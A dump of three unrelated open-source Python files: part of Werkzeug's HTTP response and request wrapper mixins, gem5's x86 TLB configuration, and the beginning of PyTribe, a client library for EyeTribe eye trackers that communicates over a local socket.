and returns headers modified for the given environment. It returns a
copy of the headers from the response with some modifications applied
if necessary.
For example the location header (if present) is joined with the root
URL of the environment. Also the content length is automatically set
to zero here for certain status codes.
.. versionchanged:: 0.6
Previously that function was called `fix_headers` and modified
the response object in place. Also since 0.6, IRIs in location
and content-location headers are handled properly.
Also starting with 0.6, Werkzeug will attempt to set the content
length if it is able to figure it out on its own. This is the
case if all the strings in the response iterable are already
encoded and the iterable is buffered.
:param environ: the WSGI environment of the request.
:return: returns a new :class:`~werkzeug.datastructures.Headers`
object.
"""
headers = Headers(self.headers)
location = None
content_location = None
content_length = None
status = self.status_code
# iterate over the headers to find all values in one go. Because
# get_wsgi_headers is used each response that gives us a tiny
# speedup.
for key, value in headers:
ikey = key.lower()
if ikey == 'location':
location = value
elif ikey == 'content-location':
content_location = value
elif ikey == 'content-length':
content_length = value
# make sure the location header is an absolute URL
if location is not None:
old_location = location
if isinstance(location, unicode):
location = iri_to_uri(location)
if self.autocorrect_location_header:
location = urlparse.urljoin(
get_current_url(environ, root_only=True),
location
)
if location != old_location:
headers['Location'] = location
# make sure the content location is a URL
if content_location is not None and \
isinstance(content_location, unicode):
headers['Content-Location'] = iri_to_uri(content_location)
# remove entity headers and set content length to zero if needed.
# Also update content_length accordingly so that the automatic
# content length detection does not trigger in the following
# code.
if 100 <= status < 200 or status == 204:
headers['Content-Length'] = content_length = '0'
elif status == 304:
remove_entity_headers(headers)
# if we can determine the content length automatically, we
# should try to do that. But only if this does not involve
# flattening the iterator or encoding of unicode strings in
# the response. We however should not do that if we have a 304
# response.
if self.automatically_set_content_length and \
self.is_sequence and content_length is None and status != 304:
try:
content_length = sum(len(str(x)) for x in self.response)
except UnicodeError:
# aha, something non-bytestringy in there, too bad, we
# can't safely figure out the length of the response.
pass
else:
headers['Content-Length'] = str(content_length)
return headers
def get_app_iter(self, environ):
"""Returns the application iterator for the given environ. Depending
on the request method and the current status code the return value
might be an empty response rather than the one from the response.
If the request method is `HEAD` or the status code is in a range
where the HTTP specification requires an empty response, an empty
iterable is returned.
.. versionadded:: 0.6
:param environ: the WSGI environment of the request.
:return: a response iterable.
"""
status = self.status_code
if environ['REQUEST_METHOD'] == 'HEAD' or \
100 <= status < 200 or status in (204, 304):
return ()
if self.direct_passthrough:
if __debug__:
_warn_if_string(self.response)
return self.response
return ClosingIterator(self.iter_encoded(), self.close)
def get_wsgi_response(self, environ):
"""Returns the final WSGI response as tuple. The first item in
the tuple is the application iterator, the second the status and
the third the list of headers. The response returned is created
specially for the given environment. For example if the request
method in the WSGI environment is ``'HEAD'`` the response will
be empty and only the headers and status code will be present.
.. versionadded:: 0.6
:param environ: the WSGI environment of the request.
:return: an ``(app_iter, status, headers)`` tuple.
"""
# XXX: code for backwards compatibility with custom fix_headers
# methods.
if self.fix_headers.func_code is not \
BaseResponse.fix_headers.func_code:
if __debug__:
from warnings import warn
warn(DeprecationWarning('fix_headers changed behavior in 0.6 '
'and is now called get_wsgi_headers. '
'See documentation for more details.'),
stacklevel=2)
self.fix_headers(environ)
headers = self.headers
else:
headers = self.get_wsgi_headers(environ)
app_iter = self.get_app_iter(environ)
return app_iter, self.status, headers.to_list()
def __call__(self, environ, start_response):
"""Process this response as WSGI application.
:param environ: the WSGI environment.
:param start_response: the response callable provided by the WSGI
server.
:return: an application iterator
"""
app_iter, status, headers = self.get_wsgi_response(environ)
start_response(status, headers)
return app_iter
class AcceptMixin(object):
"""A mixin for classes with an :attr:`~BaseResponse.environ` attribute
to get all the HTTP accept headers as
:class:`~werkzeug.datastructures.Accept` objects (or subclasses
thereof).
"""
@cached_property
def accept_mimetypes(self):
"""List of mimetypes this client supports as
:class:`~werkzeug.datastructures.MIMEAccept` object.
"""
return parse_accept_header(self.environ.get('HTTP_ACCEPT'), MIMEAccept)
@cached_property
def accept_charsets(self):
"""List of charsets this client supports as
:class:`~werkzeug.datastructures.CharsetAccept` object.
"""
return parse_accept_header(self.environ.get('HTTP_ACCEPT_CHARSET'),
CharsetAccept)
@cached_property
def accept_encodings(self):
"""List of encodings this client accepts. Encodings in a HTTP term
are compression encodings such as gzip. For charsets have a look at
:attr:`accept_charset`.
"""
return parse_accept_header(self.environ.get('HTTP_ACCEPT_ENCODING'))
@cached_property
def accept_languages(self):
"""List of languages this client accepts as
:class:`~werkzeug.datastructures.LanguageAccept` object.
.. versionchanged 0.5
In previous versions this was a regular
:class:`~werkzeug.datastructures.Accept` object.
"""
return parse_accept_header(self.environ.get('HTTP_ACCEPT_LANGUAGE'),
LanguageAccept)
class ETagRequestMixin(object):
"""Add entity tag and cache descriptors to a request object or object with
a WSGI environment available as :attr:`~BaseRequest.environ`. This not
only provides access to etags but also to the cache control header.
"""
@cached_property
def cache_control(self):
"""A :class:`~werkzeug.datastructures.RequestCacheControl` object
for the incoming cache control headers.
"""
cache_control = self.environ.get('HTTP_CACHE_CONTROL')
return parse_cache_control_header(cache_control, None,
RequestCacheControl)
@cached_property
def if_match(self):
"""An object containing all the etags in the `If-Match` header.
:rtype: :class:`~werkzeug.datastructures.ETags`
"""
return parse_etags(self.environ.get('HTTP_IF_MATCH'))
@cached_property
def if_none_match(self):
"""An object containing all the etags in the `If-None-Match` header.
:rtype: :class:`~werkzeug.datastructures.ETags`
"""
return parse_etags(self.environ.get('HTTP_IF_NONE_MATCH'))
@cached_property
def if_modified_since(self):
"""The parsed `If-Modified-Since` header as datetime object."""
return parse_date(self.environ.get('HTTP_IF_MODIFIED_SINCE'))
@cached_property
def if_unmodified_since(self):
"""The parsed `If-Unmodified-Since` header as datetime object."""
return parse_date(self.environ.get('HTTP_IF_UNMODIFIED_SINCE'))
@cached_property
def if_range(self):
"""The parsed `If-Range` header.
.. versionadded:: 0.7
:rtype: :class:`~werkzeug.datastructures.IfRange`
"""
return parse_if_range_header(self.environ.get('HTTP_IF_RANGE'))
@cached_property
def range(self):
"""The parsed `Range` header.
.. versionadded:: 0.7
:rtype: :class:`~werkzeug.datastructures.Range`
"""
return parse_range_header(self.environ.get('HTTP_RANGE'))
class UserAgentMixin(object):
"""Adds a `user_agent` attribute to the request object which contains the
parsed user agent of the browser that triggered the request as a
:class:`~werkzeug.useragents.UserAgent` object.
"""
@cached_property
def user_agent(self):
"""The current user agent."""
from werkzeug.useragents import UserAgent
return UserAgent(self.environ)
class AuthorizationMixin(object):
"""Adds an :attr:`authorization` property that represents the parsed
value of the `Authorization` header as
:class:`~werkzeug.datastructures.Authorization` object.
"""
@cached_property
def authorization(self):
"""The `Authorization` object in parsed form."""
header = self.environ.get('HTTP_AUTHORIZATION')
return parse_authorization_header(header)
class ETagResponseMixin(object):
"""Adds extra functionality to a response object for etag and cache
handling. This mixin requires an object with at least a `headers`
object that implements a dict like interface similar to
:class:`~werkzeug.datastructures.Headers`.
If you want the :meth:`freeze` method to automatically add an etag, you
have to mixin this method before the response base class. The default
response class does not do that.
"""
@property
def cache_control(self):
"""The Cache-Control general-header field is used to specify
directives that MUST be obeyed by all caching mechanisms along the
request/response chain.
"""
def on_update(cache_control):
if not cache_control and 'cache-control' in self.headers:
del self.headers['cache-control']
elif cache_control:
self.headers['Cache-Control'] = cache_control.to_header()
return parse_cache_control_header(self.headers.get('cache-control'),
on_update,
ResponseCacheControl)
def make_conditional(self, request_or_environ):
"""Make the response conditional to the request. This method works
best if an etag was defined for the response already. The `add_etag`
method can be used to do that. If called without etag just the date
header is set.
This does nothing if the request method in the request or environ is
anything but GET or HEAD.
It does not remove the body of the response because that's something
the :meth:`__call__` function does for us automatically.
Returns self so that you can do ``return resp.make_conditional(req)``
but modifies the object in-place.
:param request_or_environ: a request object or WSGI environment to be
used to make the response conditional
against.
"""
environ = _get_environ(request_or_environ)
if environ['REQUEST_METHOD'] in ('GET', 'HEAD'):
# if the date is not in the headers, add it now. We however
# will not override an already existing header. Unfortunately
# this header will be overriden by many WSGI servers including
# wsgiref.
if 'date' not in self.headers:
self.headers['Date'] = http_date()
if 'content-length' not in self.headers:
self.headers['Content-Length'] = len(self.data)
if not is_resource_modified(environ, self.headers.get('etag'), None,
self.headers.get('last-modified')):
self.status_code = 304
return self
def add_etag(self, overwrite=False, weak=False):
"""Add an etag for the current response if there is none yet."""
if overwrite or 'etag' not in self.headers:
self.set_etag(generate_etag(self.data), weak)
def set_etag(self, etag, weak=False):
"""Set the etag, and override the old one if there was one."""
self.headers['ETag'] = quote_etag(etag, weak)
def get_etag(self):
"""Return a tuple in the form ``(etag, is_weak)``. If there is no
ETag the return value is ``(None, None)``.
"""
return unquote_etag(self.headers.get('ETag'))
def freeze(self, no_etag=False):
"""Call this method if you want to make your response object ready for
pickeling. This buffers the generator if there is one. This also
sets the etag unless `no_etag` is set to `True`.
"""
if not no_etag:
self.add_etag()
super(ETagResponseMixin, self).freeze()
accept_ranges = header_property('Accept-Ranges', doc='''
The `Accept-Ranges` header. Even though the name would indicate
that multiple values are supported, it must be one string token only.
The values ``'bytes'`` and ``'none'`` are common.
.. versionadded:: 0.7''')
def _get_content_range(self):
def on_update(rng):
if not rng:
del self.headers['content-range']
else:
self.headers['Content-Range'] = rng.to_header()
rv = parse_content_range_header(self.headers.get('content-range'),
on_update)
# always provide a content range object to make the descriptor
# more user friendly. It provides an unset() method that can be
# used to remove the header quickly.
if rv is None:
rv = ContentRange(None, None, None, on_update=on_update)
return rv
def _set_content_range(self, value):
if not value:
del self.headers['content-range']
elif isinstance(value, basestring):
self.headers['Content-Range'] = value
else:
self.headers['Content-Range'] = value.to_header()
content_range = property(_get_content_range, _set_content_range, doc='''
The `Content-Range` header as
:class:`~werkzeug.datastructures.ContentRange` object. Even if the
header is not set it wil provide such an object for easier
manipulation.
.. versionadded:: 0.7''')
del _get_content_range, _set_content_range
class ResponseStream(object):
"""A file descriptor like object used by the :class:`ResponseStreamMixin` to
represent the body of the stream. It directly pushes into the response
iterable of the response object.
"""
mode = 'wb+'
def __init__(self, response):
self.response = response
self.closed = False
def write(self, value):
if self.closed:
raise ValueError('I/O operation on closed file')
self.response._ensure_sequence(mutable=True)
self.response.response.append(value)
def writelines(self, seq):
for item in seq:
self.write(item)
def close(self):
self.closed = True
def flush(self):
if self.closed:
raise ValueError('I/O operation on closed file')
def isatty(self):
if self.closed:
raise ValueError('I/O operation on closed file')
return False
@property
def encoding(self):
return self.response.charset
class ResponseStreamMixin(object):
"""Mixin for :class:`BaseRequest` subclasses. Classes that inherit from
this mixin will automatically get a :attr:`stream` property that provides
a write-only interface to the response iterable.
"""
@cached_property
def stream(self):
"""The response iterable as write-only stream."""
return ResponseStream(self)
class CommonRequestDescriptorsMixin(object):
"""A mixin for :class:`BaseRequest` subclasses. Request objects that
mix this class in will automatically get descriptors for a couple of
HTTP headers with automatic type conversion.
.. versionadded:: 0.5
"""
content_type = environ_property('CONTENT_TYPE', doc='''
The Content-Type entity-header field indicates the media type of
the entity-body sent to the recipient or, in the case of the HEAD
method, the media type that would have been sent had the request
been a GET.''')
content_length = environ_property('CONTENT_LENGTH', None, int, str, doc='''
The Content-Length entity-header field indicates the size of the
entity-body in bytes or, in the case of the HEAD method, the size of
the entity-body that would have been sent had the request been a
GET.''')
referrer = environ_property('HTTP_REFERER', doc='''
The Referer[sic] request-header field allows the client to specify,
for the server's benefit, the address (URI) of the resource from which
the Request-URI was obtained (the "referrer", although the header
field is misspelled).''')
date = environ_property('HTTP_DATE', None, parse_date, doc='''
The Date general-header field represents the date and time at which
the message was originated, having the same semantics as orig-date
in RFC 822.''')
max_forwards = environ_property('HTTP_MAX_FORWARDS', None, int, doc='''
The Max-Forwards request-header field provides a mechanism with the
TRACE and OPTIONS methods to limit the number of proxies or gateways
that can forward the request to the next inbound server.''')
def _parse_content_type(self):
if not hasattr(self, '_parsed_content_type'):
self._parsed_content_type = \
parse_options_header(self.environ.get('CONTENT_TYPE', ''))
@property
def mimetype(self):
"""Like :attr:`content_type` but without parameters (eg, without
charset, type etc.). For example if the content
type is ``text/html; charset=utf-8`` the mimetype would be
``'text/html'``.
"""
self._parse_content_type()
return self._parsed_content_type[0]
@property
def mimetype_params(self):
"""The mimetype parameters as dict. For example if the content
type is ``text/html; charset=utf-8`` the params would be
``{'charset': 'utf-8'}``.
"""
self._parse_content_type()
return self._parsed_content_type[1]
@cached_property
def pragma(self):
"""The Pragma general-header field is used to include
implementation-specific directives that might apply to any recipient
along the request/response chain. All pragma directives specify
optional behavior from the viewpoint of the protocol; however, some
systems MAY require that behavior be consistent with the directives.
"""
return parse_set_header(self.environ.get('HTTP_PRAGMA', ''))
class CommonResponseDescriptorsMixin(object):
"""A mixin for :class:`BaseResponse` subclasses. Response objects that
mix this class in will automatically get descriptors for a couple of
HTTP headers with automatic type conversion.
"""
def _get_mimetype(self):
ct = self.headers.get('content-type')
if ct:
return ct.split(';')[0].strip()
def _set_mimetype(self, value):
self.headers['Content-Type'] = get_content_type(value, self.charset)
def _get_mimetype_params(self):
def on_update(d):
self.headers['Content-Type'] = \
dump_options_header(self.mimetype, d)
d = parse_options_header(self.headers.get('content-type', ''))[1]
return CallbackDict(d, on_update)
mimetype = property(_get_mimetype, _set_mimetype, doc='''
The mimetype (content type without charset etc.)''')
mimetype_params = property(_get_mimetype_params, doc='''
The mimetype parameters as dict. For example if the content
type is ``text/html; charset=utf-8`` the params would be
``{'charset': 'utf-8'}``.
.. versionadded:: 0.5
''')
location = header_property('Location', doc='''
The Location response-header field is used to redirect the recipient
to a location other than the Request-URI for completion of the request
or identification of a new resource.''')
age = header_property('Age', None, parse_date, http_date, doc='''
The Age response-header field conveys the sender's estimate of the
amount of time since the response (or its revalidation) was
generated at the origin server.
Age values are non-negative decimal integers, representing time in
seconds.''')
content_type = header_property('Content-Type', doc='''
The Content-Type entity-header field indicates the media type of the
entity-body sent to the recipient or, in the case of the HEAD method,
the media type that would have been sent had the request been a GET.
''')
content_length = header_property('Content-Length', None, int, str, doc='''
The Content-Length entity-header field indicates the size of the
entity-body, in decimal number of OCTETs, sent to the recipient or,
in the case of the HEAD method, the size of the entity-body that would
have been sent had the request been a GET.''')
content_location = header_property('Content-Location', doc='''
The Content-Location entity-header field MAY be used to supply the
resource location for the entity enclosed in the message when that
entity is accessible from a location separate from the requested
resource's URI.''')
content_encoding = header_property('Content-Encoding', doc='''
The Content-Encoding entity-header field is used as a modifier to the
media-type. When present, its value indicates what additional content
codings have been applied to the entity-body, and thus what decoding
mechanisms must be applied in order to obtain the media-type
referenced by the Content-Type header field.''')
content_md5 = header_property('Content-MD5', doc='''
The Content-MD5 entity-header field, as defined in RFC 1864, is an
MD5 digest of the entity-body for the purpose of providing an
end-to-end message integrity check (MIC) of the entity-body. (Note:
a MIC is good for detecting accidental modification of the
entity-body in transit, but is not proof against malicious attacks.)
''')
date = header_property('Date', None, parse_date, http_date, doc='''
The Date general-header field represents the date and time at which
the message was originated, having the same semantics as orig-date
in RFC 822.''')
expires = header_property('Expires', None, parse_date, http_date, doc='''
The Expires entity-header field gives the date/time after which the
response is considered stale. A stale cache entry may not normally be
returned by a cache.''')
last_modified = header_property('Last-Modified', None, parse_date,
http_date, doc='''
The Last-Modified entity-header field indicates the date and time at
which the origin server believes the variant was last modified.''')
def _get_retry_after(self):
value = self.headers.get('retry-after')
if value is None:
return
elif value.isdigit():
return datetime.utcnow() + timedelta(seconds=int(value))
return parse_date(value)
def _set_retry_after(self, value):
if value is None:
if 'retry-after' in self.headers:
del self.headers['retry-after']
return
elif isinstance(value, datetime):
value = http_date(value)
else:
value = str(value)
self.headers['Retry-After'] = value
retry_after = property(_get_retry_after, _set_retry_after, doc='''
The Retry-After response-header field can be used with a 503 (Service
Unavailable) response to indicate how long the service is expected
to be unavailable to the requesting client.
Time in seconds until expiration or date.''')
def _set_property(name, doc=None):
def fget(self):
def on_update(header_set):
if not header_set and name in self.headers:
del self.headers[name]
elif header_set:
self.headers[name] = header_set.to_header()
return parse_set_header(self.headers.get(name), on_update)
def fset(self, value):
if not value:
del self.headers[name]
elif isinstance(value, basestring):
self.headers[name] = value
else:
self.headers[name] = dump_header(value)
return property(fget, fset, doc=doc)
vary = _set_property('Vary', doc='''
The Vary field value indicates the set of request-header fields that
fully determines, while the response is fresh, whether a cache is
permitted to use the response to reply to a subsequent request
without revalidation.''')
content_language = _set_property('Content-Language', doc='''
The Content-Language entity-header field describes the natural
language(s) of the intended audience for the enclosed entity. Note
that this might not be equivalent to all the languages used within
the entity-body.''')
allow = _set_property('Allow', doc='''
The Allow entity-header field lists the set of methods supported
by the resource identified by the Request-URI. The purpose of this
field is strictly to inform the recipient of valid methods
associated with the resource. An Allow header field MUST be
present in a 405 (Method Not Allowed) response.''')
del _set_property, _get_mimetype, _set_mimetype, _get_retry_after, \
_set_retry_after
class WWWAuthenticateMixin(object):
"""Adds a :attr:`www_authenticate` property to a response object."""
@property
def www_authenticate(self):
"""The `WWW-Authenticate` header in a parsed form."""
def on_update(www_auth):
if not www_auth and 'www-authenticate' in self.headers:
del self.headers['www-authenticate']
elif www_auth:
self.headers['WWW-Authenticate'] = www_auth.to_header()
header = self.headers.get('www-authenticate')
return parse_www_authenticate_header(header, on_update)
class Request(BaseRequest, AcceptMixin, ETagRequestMixin,
UserAgentMixin, AuthorizationMixin,
CommonRequestDescriptorsMixin):
"""Full featured request object implementing the following mixins:
- :class:`AcceptMixin` for accept header parsing
- :class:`ETagRequestMixin` for etag and cache control handling
- :class:`UserAgentMixin` for user agent introspection
- :class:`AuthorizationMixin` for http auth handling
- :class:`CommonRequestDescriptorsMixin` for common headers
"""
class Response(BaseResponse, ETagResponseMixin, ResponseStreamMixin,
CommonResponseDescriptorsMixin,
WWWAuthenticateMixin):
"""Full featured response object implementing the following mixins:
- :class:`ETagResponseMixin` for etag and cache control handling
- :class:`ResponseStreamMixin` to add support for the `stream` property
- :class:`CommonResponseDescriptorsMixin` for various HTTP descriptors
- :class:`WWWAuthenticateMixin` for HTTP authentication support
"""
|
ajgallegog/gem5_arm | refs/heads/master | src/arch/x86/X86TLB.py | 61 | # Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
from m5.params import *
from m5.proxy import *
from BaseTLB import BaseTLB
from MemObject import MemObject
class X86PagetableWalker(MemObject):
type = 'X86PagetableWalker'
cxx_class = 'X86ISA::Walker'
cxx_header = 'arch/x86/pagetable_walker.hh'
port = MasterPort("Port for the hardware table walker")
system = Param.System(Parent.any, "system object")
num_squash_per_cycle = Param.Unsigned(4,
"Number of outstanding walks that can be squashed per cycle")
class X86TLB(BaseTLB):
type = 'X86TLB'
cxx_class = 'X86ISA::TLB'
cxx_header = 'arch/x86/tlb.hh'
size = Param.Unsigned(64, "TLB size")
walker = Param.X86PagetableWalker(\
X86PagetableWalker(), "page table walker")
|
luojxxx/handsfree | refs/heads/master | PyTribe-master/pytribe.py | 2 | # PyTribe: classes to communicate with EyeTribe eye trackers
#
# author: Edwin Dalmaijer
# email: edwin.dalmaijer@psy.ox.ac.uk
#
# version 3 (11-Aug-2014)
import os
import copy
import json
import time
import socket
from threading import Thread, Lock
from multiprocessing import Queue
class EyeTribe:
"""class for eye tracking and data collection using an EyeTribe tracker
"""
def __init__(self, logfilename='default.txt'):
"""Initializes an EyeTribe instance
keyword arguments
logfilename -- string indicating the log file name, including
a full path to it's location and an extension
(default = 'default.txt')
"""
# initialize data collectors
self._logfile = open('%s.tsv' % (logfilename), 'w')
self._separator = '\t'
self._log_header()
self._queue = Queue()
# initialize connection
self._connection = connection(host='localhost',port=6555)
self._tracker = tracker(self._connection)
self._heartbeat = heartbeat(self._connection)
# create a new Lock
self._lock = Lock()
# initialize heartbeat thread
self._beating = True
self._heartbeatinterval = self._tracker.get_heartbeatinterval() / 1000.0
self._hbthread = Thread(target=self._heartbeater, args=[self._heartbeatinterval])
self._hbthread.daemon = True
self._hbthread.name = 'heartbeater'
# initialize sample streamer
self._streaming = True
self._samplefreq = self._tracker.get_framerate()
self._intsampletime = 1.0 / self._samplefreq
self._ssthread = Thread(target=self._stream_samples, args=[self._queue])
self._ssthread.daemon = True
self._ssthread.name = 'samplestreamer'
# initialize data processer
self._processing = True
self._logdata = False
self._currentsample = self._tracker.get_frame()
self._dpthread = Thread(target=self._process_samples, args=[self._queue])
self._dpthread.daemon = True
self._dpthread.name = 'dataprocessor'
# start all threads
self._hbthread.start()
self._ssthread.start()
self._dpthread.start()
# initialize calibration
self.calibration = calibration(self._connection)
def start_recording(self):
"""Starts data recording
"""
# set self._logdata to True, so the data processing thread starts
# writing samples to the log file
if not self._logdata:
self._logdata = True
self.log_message("start_recording")
def stop_recording(self):
"""Stops data recording
"""
# set self._logdata to False, so the data processing thread does not
# write samples to the log file
if self._logdata:
self.log_message("stop_recording")
self._logdata = False
def log_message(self, message):
"""Logs a message to the logfile, time locked to the most recent
sample
"""
# timestamp, based on the most recent sample
if self._currentsample != None:
ts = self._currentsample['timestamp']
t = self._currentsample['time']
else:
ts = ''
t = ''
# assemble line
line = self._separator.join(map(str,['MSG',ts,t,message]))
# write message
self._logfile.write(line + '\n') # to internal buffer
self._logfile.flush() # internal buffer to RAM
os.fsync(self._logfile.fileno()) # RAM file cache to disk
def sample(self):
"""Returns the most recent point of regard (=gaze location on screen)
coordinates (smoothed signal)
arguments
None
returns
gaze -- a (x,y) tuple indicating the point of regard
"""
if self._currentsample == None:
return None, None
else:
return (self._currentsample['avgx'],self._currentsample['avgy'])
def pupil_size(self):
"""Returns the most recent pupil size sample (an average of the size
of both pupils)
arguments
None
returns
pupsize -- a float indicating the pupil size (in arbitrary units)
"""
if self._currentsample == None:
return None
else:
return self._currentsample['psize']
def close(self):
"""Stops all data streaming, and closes both the connection to the
tracker and the logfile
"""
# if we are currently recording, stop doing so
if self._logdata:
self.stop_recording()
# signal all threads to halt
self._beating = False
self._streaming = False
self._processing = False
# close the log file
self._logfile.close()
# close the connection
self._connection.close()
def _wait_while_calibrating(self):
"""Waits until the tracker is not in the calibration state
"""
while self._tracker.get_iscalibrating():
pass
return True
def _heartbeater(self, heartbeatinterval):
"""Continuously sends heartbeats to the tracker, to let it know the
connection is still alive (it seems to think we could die any
moment now, and is very keen on reassurance of our good health;
almost like my grandparents...)
arguments
heartbeatinterval -- float indicating the heartbeatinterval in
seconds; note that this is different from
the value that the EyeTribe tracker reports:
that value is in milliseconds and should be
recalculated to seconds here!
"""
# keep beating until it is signalled that we should stop
while self._beating:
# do not bother the tracker when it is calibrating
#self._wait_while_calibrating()
# wait for the Threading Lock to be released, then lock it
self._lock.acquire(True)
# send heartbeat
self._heartbeat.beat()
# release the Threading Lock
self._lock.release()
# wait for a bit
time.sleep(heartbeatinterval)
def _stream_samples(self, queue):
"""Continuously polls the device, and puts all new samples in a
Queue instance
arguments
queue -- a multithreading.Queue instance, to put samples
into
"""
# keep streaming until it is signalled that we should stop
while self._streaming:
# do not bother the tracker when it is calibrating
#self._wait_while_calibrating()
# wait for the Threading Lock to be released, then lock it
self._lock.acquire(True)
# get a new sample
sample = self._tracker.get_frame()
# put the sample in the Queue
queue.put(sample)
# release the Threading Lock
self._lock.release()
# pause for half the intersample time, to avoid an overflow
# (but to make sure to not miss any samples)
time.sleep(self._intsampletime/2)
def _process_samples(self, queue):
"""Continuously processes samples, updating the most recent sample
and writing data to a the log file when self._logdata is set to True
arguments
queue -- a multithreading.Queue instance, to read samples
from
"""
# keep processing until it is signalled that we should stop
while self._processing:
# wait for the Threading Lock to be released, then lock it
self._lock.acquire(True)
# read new item from the queue
if not queue.empty():
sample = queue.get()
else:
sample = None
# release the Threading Lock
self._lock.release()
# update newest sample
if sample != None:
# check if the new sample is the same as the current sample
if not self._currentsample['timestamp'] == sample['timestamp']:
# update current sample
self._currentsample = copy.deepcopy(sample)
# write to file if data logging is on
if self._logdata:
self._log_sample(sample)
def _log_sample(self, sample):
"""Writes a sample to the log file
arguments
sample -- a sample dict, as is returned by
tracker.get_frame
"""
# assemble new line
line = self._separator.join(map(str,[ sample['timestamp'],
sample['time'],
sample['fix'],
sample['state'],
sample['rawx'],
sample['rawy'],
sample['avgx'],
sample['avgy'],
sample['psize'],
sample['Lrawx'],
sample['Lrawy'],
sample['Lavgx'],
sample['Lavgy'],
sample['Lpsize'],
sample['Lpupilx'],
sample['Lpupily'],
sample['Rrawx'],
sample['Rrawy'],
sample['Ravgx'],
sample['Ravgy'],
sample['Rpsize'],
sample['Rpupilx'],
sample['Rpupily']
]))
# write line to log file
self._logfile.write(line + '\n') # to internal buffer
self._logfile.flush() # internal buffer to RAM
os.fsync(self._logfile.fileno()) # RAM file cache to disk
def _log_header(self):
"""Logs a header to the data file
"""
# write a header to the data file
header = self._separator.join(['timestamp','time','fix','state',
'rawx','rawy','avgx','avgy','psize',
'Lrawx','Lrawy','Lavgx','Lavgy','Lpsize','Lpupilx','Lpupily',
'Rrawx','Rrawy','Ravgx','Ravgy','Rpsize','Rpupilx','Rpupily'
])
self._logfile.write(header + '\n') # to internal buffer
self._logfile.flush() # internal buffer to RAM
os.fsync(self._logfile.fileno()) # RAM file cache to disk
self._firstlog = False
# # # # #
# low-level classes
class connection:
"""class for connections with the EyeTribe tracker"""
def __init__(self, host='localhost', port=6555):
"""Initializes the connection with the EyeTribe tracker
keyword arguments
host -- a string indicating the host IP, NOTE: currently only
'localhost' is supported (default = 'localhost')
port -- an integer indicating the port number, NOTE: currently
only 6555 is supported (default = 6555)
"""
# properties
self.host = host
self.port = port
self.resplist = []
self.DEBUG = False
# initialize a connection
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self.host,self.port))
# Create lock
self._request_lock = Lock()
def request(self, category, request, values):
"""Send a message over the connection
arguments
category -- string indicating the query category
request -- string indicating the actual request of the message
values -- dict or list containing parameters of the request
"""
# create a JSON formatted string
msg = self.create_json(category, request, values)
# send the message over the connection
self._request_lock.acquire()
self.sock.send(msg)
# print request in DEBUG mode
if self.DEBUG:
print("REQUEST: '%s'" % msg)
# give the tracker a wee bit of time to reply
time.sleep(0.005)
# get new responses
success = self.get_response()
self._request_lock.release()
# return the appropriate response
if success:
for i in range(len(self.resplist)):
# check if the category matches
if self.resplist[i]['category'] == category:
# if this is a heartbeat, return
if self.resplist[i]['category'] == 'heartbeat':
return self.resplist.pop(i)
# if this is another category, check if the request
# matches
elif self.resplist[i]['request'] == request:
return self.resplist.pop(i)
# on a connection error, get_response returns False and a connection
# error should be returned
else:
return self.parse_json('{"statuscode":901,"values":{"statusmessage":"connection error"}}')
def get_response(self):
"""Asks for a response, and adds these to the list of all received
responses (basically a very simple queue)
"""
# try to get a new response
try:
response = self.sock.recv(32768)
# print reply in DEBUG mode
if self.DEBUG:
print("REPLY: '%s'" % response)
# if it fails, revive the connection and return a connection error
except socket.error:
print("reviving connection")
self.revive()
response = '{"statuscode":901,"values":{"statusmessage":"connection error"}}'
return False
# split the responses (in case multiple came in)
response = response.split('\n')
# add parsed responses to the internal list
for r in response:
if r:
self.resplist.append(self.parse_json(r))
return True
def create_json(self, category, request, values):
"""Creates a new json message, in the format that is required by the
EyeTribe tracker; these messages consist of a categort, a request and
a (list of) value(s), which can be thought of as class.method.value
(for more info, see: http://dev.theeyetribe.com/api/)
arguments
category -- query category (string), e.g. 'tracker',
'calibration', or 'heartbeat'
request -- the request message (string), e.g. 'get' for the
'tracker' category
values -- a dict of parameters and their values, e.g.
{"push":True, "version":1}
OR:
a list of parameters, e.g. ['push','iscalibrated']
OR:
None to pass no values at all
keyword arguments
None
returns
jsonmsg -- a string in json format, that can be directly sent to
the EyeTribe tracker
"""
# check if 'values' is a dict
if type(values) == dict:
# create a value string
valuestring = '''{\n'''
# loop through all keys of the value dict
for k in values.keys():
# add key and value
valuestring += '\t\t"%s": %s,\n' % (k, values[k])
# omit final comma
valuestring = valuestring[:-2]
valuestring += '\n\t}'
# check if 'values' is a tuple or a list
elif type(values) in [list,tuple]:
# create a value string
valuestring = '''[ "'''
# compose a string of all the values
valuestring += '", "'.join(values)
# append the list ending
valuestring += '" ]'
# check if there are no values
